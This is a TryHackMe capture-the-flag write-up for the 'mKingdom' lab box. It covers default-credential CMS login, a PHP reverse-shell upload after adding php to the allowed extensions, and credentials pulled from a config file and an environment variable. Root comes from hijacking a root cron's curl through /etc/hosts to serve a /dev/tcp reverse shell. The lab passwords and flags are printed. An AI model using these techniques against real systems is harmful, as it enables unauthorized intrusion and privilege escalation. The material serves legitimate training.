DEATHESTHER
← All write-ups

TRYHACKME WRITE-UP

mKingdom - TryHackMe writeup

InfoSMBSudo abuse8 min read

View on GitHub

Beginner-friendly box inspired by a certain mustache man.

Initial enumeration

starting with nmap scan to check running port and services

death@esther:~$  nmap -sV 10.48.134.165
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-06-03 20:52 IST
Nmap scan report for 10.48.134.165
Host is up (0.028s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
85/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.96 seconds

we can see website is runnning on port 85 strange

Web enumeration

let nevigate to website

image

i didnt find anything suspicious here so let make a directore enumeration

death@esther:~$ dirsearch -u 10.48.134.165:85
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /home/death/reports/_10.48.134.165_85/_26-06-03_20-52-19.txt

Target: http://10.48.134.165:85/

[20:52:19] Starting: 
[20:52:22] 403 -  291B  - /.ht_wsr.txt
[20:52:22] 403 -  294B  - /.htaccess.bak1
[20:52:22] 403 -  294B  - /.htaccess.orig
[20:52:22] 403 -  296B  - /.htaccess.sample
[20:52:22] 403 -  294B  - /.htaccess.save
[20:52:22] 403 -  295B  - /.htaccess_extra
[20:52:22] 403 -  285B  - /.html
[20:52:22] 403 -  293B  - /.htaccessOLD2
[20:52:22] 403 -  284B  - /.htm
[20:52:22] 403 -  292B  - /.htaccessBAK
[20:52:22] 403 -  294B  - /.htaccess_orig
[20:52:22] 403 -  292B  - /.htaccess_sc
[20:52:22] 403 -  292B  - /.htaccessOLD
[20:52:22] 403 -  291B  - /.httr-oauth
[20:52:22] 403 -  290B  - /.htpasswds
[20:52:22] 403 -  294B  - /.htpasswd_test
[20:52:23] 403 -  284B  - /.php
[20:52:23] 403 -  285B  - /.php3
[20:52:31] 301 -  314B  - /app  ->  http://10.48.134.165:85/app/
[20:52:31] 200 -  457B  - /app/
[20:52:50] 403 -  293B  - /server-status
[20:52:50] 403 -  294B  - /server-status/

Task Completed

We found an dir /app http://10.49.157.182:85/app/ let take a look

image

click on jump button it redirect us on /castle were a cms is hosted

image

direct enumerating again

death@esther:~$ dirsearch -u 10.48.134.165:85/app/castle
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /home/death/reports/_10.48.134.165_85/_app_castle_26-06-03_20-52-28.txt

Target: http://10.48.134.165:85/

[20:52:28] Starting: app/castle/
[20:52:42] 403 -  302B  - /app/castle/.ht_wsr.txt
[20:52:42] 403 -  305B  - /app/castle/.htaccess.bak1
[20:52:42] 403 -  305B  - /app/castle/.htaccess.orig
[20:52:42] 403 -  305B  - /app/castle/.htaccess.save
[20:52:42] 403 -  307B  - /app/castle/.htaccess.sample
[20:52:42] 403 -  306B  - /app/castle/.htaccess_extra
[20:52:42] 403 -  304B  - /app/castle/.htaccessOLD2
[20:52:42] 403 -  303B  - /app/castle/.htaccessBAK
[20:52:42] 403 -  305B  - /app/castle/.htaccess_orig
[20:52:42] 403 -  303B  - /app/castle/.htaccess_sc
[20:52:42] 403 -  303B  - /app/castle/.htaccessOLD
[20:52:42] 403 -  295B  - /app/castle/.htm
[20:52:42] 403 -  296B  - /app/castle/.html
[20:52:42] 403 -  305B  - /app/castle/.htpasswd_test
[20:52:42] 403 -  302B  - /app/castle/.httr-oauth
[20:52:42] 403 -  301B  - /app/castle/.htpasswds
[20:52:43] 403 -  295B  - /app/castle/.php
[20:52:43] 403 -  296B  - /app/castle/.php3
[20:52:51] 301 -  333B  - /app/castle/application  ->  http://10.48.134.165:85/app/castle/application/
[20:52:51] 200 -    0B  - /app/castle/application/
[20:52:54] 200 -    2KB - /app/castle/composer.json
[20:52:54] 200 -  270KB - /app/castle/composer.lock
[20:53:00] 301 -  444B  - /app/castle/index.php/login/  ->  http://10.48.134.165:85/app/castle/index.php/login
[20:53:10] 200 -  175B  - /app/castle/robots.txt
[20:53:15] 301 -  329B  - /app/castle/updates  ->  http://10.48.134.165:85/app/castle/updates/

we got a login page let try some combo

image

ohh we got it user:admin pass: password

image

as i click on file we can see we can upload a file let try to upload php reverse shell

image

let git clone revshell as im using pentest moneky shell

git clone https://github.com/pentestmonkey/php-reverse-shell.git
cd php-reverse-shell
nano php-reverse-shell.php 
image

Change ip as ur tun0 ip

open netcat in another terminal

nc-lnvp 1234

now uplode the shell

image

so its says invalid extention

image

mm we need to find a way to upload either chnage exention or identify allowed extention

ok so there is system & setting option and in that file setting option and there are allowed extentions let add php at last so

, php
image

Now let try to reupload

image

its upload successfully let click on link and get the connection

we got the connection

death@esther:~$ nc -lnvp 1234
Listening on 0.0.0.0 1234
Connection received on 10.48.134.165 37668
Linux mkingdom.thm 4.4.0-148-generic #174~14.04.1-Ubuntu SMP Thu May 9 08:17:37 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
 11:53:15 up 34 min,  0 users,  load average: 0.01, 0.04, 0.03
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data),1003(web)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ pwd
/

Okay by exploring we got 2 user toad and mario we can access home diretcory

image

so i move to search for config in config file i got this file it it wierd so let move continue

 cat counter.sh
cat counter.sh
#!/bin/bash
echo "There are $(ls -laR /var/www/html/app/castle/ | wc -l) folder and files in TheCastleApp in - - - - > $(date)."

so after check whole directory i got this file /var/www/html/app/castle/application/config we got database.php file

cat /var/www/html/app/castle/application/config/database.php

we got pass for user toad image

user toad psss: toadisthebest

so i forgot to stable the shell as it refuse to switch user only posible with terminal so i quickly spawn python shell

python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
ctrl + z
stty raw -echo; fg
stty rows 38 columns 116
image

at toad home i go this file smb.txt and it contain this

image

as i check we cant run sudo and we still cant peak at mario home

toad@mkingdom:~$ sudo -l
sudo -l
[sudo] password for toad: toadisthebest
             
Sorry, user toad may not run sudo on mkingdom.
toad@mkingdom:~$
toad@mkingdom:~$ ls /home/mar*
ls /home/mar*
ls: cannot open directory /home/mario: Permission denied
toad@mkingdom:~$ 

Lateral Movement to User Mario

checked env and got this base64 encoded token in it image

death@esther:~$ echo "aWthVGVOVEFOdEVTCg=="| base64 -d
ikaTeNTANtES
death@esther:~$ 

as i decoded i think maybe this is pass of mario let try

toad@mkingdom:~$ su mario
su mario
Password: ikaTeNTANtES

mario@mkingdom:/home/toad$

now we are mario

User flag.txt

image

we dont have perm to use cat cmd so we need to use head to view content of user.txt file

thm{030a769febb1b3291da1375234b84283}

Next I snoop around a bit with no luck of finding a way to escalate to root user.

So next try to upload pspy

wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.1/pspy64
  1. Start a server on your own machine using the command:
python3 -m http.server 4444

Now wget the file from your own machine to mkingdom’s machine:

wget http://'YOUR_MACHINE_IP':8000/Desktop/pspy64 -O /tmp/pspy64

let execute it

cd /tmp
chmod +x pspy64
./pspy64

as i relogin on webite pspy64 got some

image that counter file is still running

Domain Hijacking for Root Access Here the command curl mkingdom.thm:85/app/castle/application/counter.sh has uid of 0 so if we can highjack the domain mkingdom.thm then we can get root privilege.

Now to get the root privileges we can highjack the domain mkingdom.thm and to do that we need to edit the /etc/hosts file and change the ip address of mkingdom.thm domain to you own machine ip address in my case it is

image

as i added my tun0 ip let save it Next, replicate the directory structure and place a malicious script:

mkdir -p app/castle/application
cd app/castle/application
nano counter.sh

add revshell code

sh -i >& /dev/tcp/<tun0 ip>/4444 0>&1

now start a python server at own system

sudo python3 -m http.server 85
image

and start netcat at another terminal

nc -lnvp 4444
image and refresh the website

use head cat still cant use image

thm{e8b2f52d88b9930503cc16ef48775df0}

image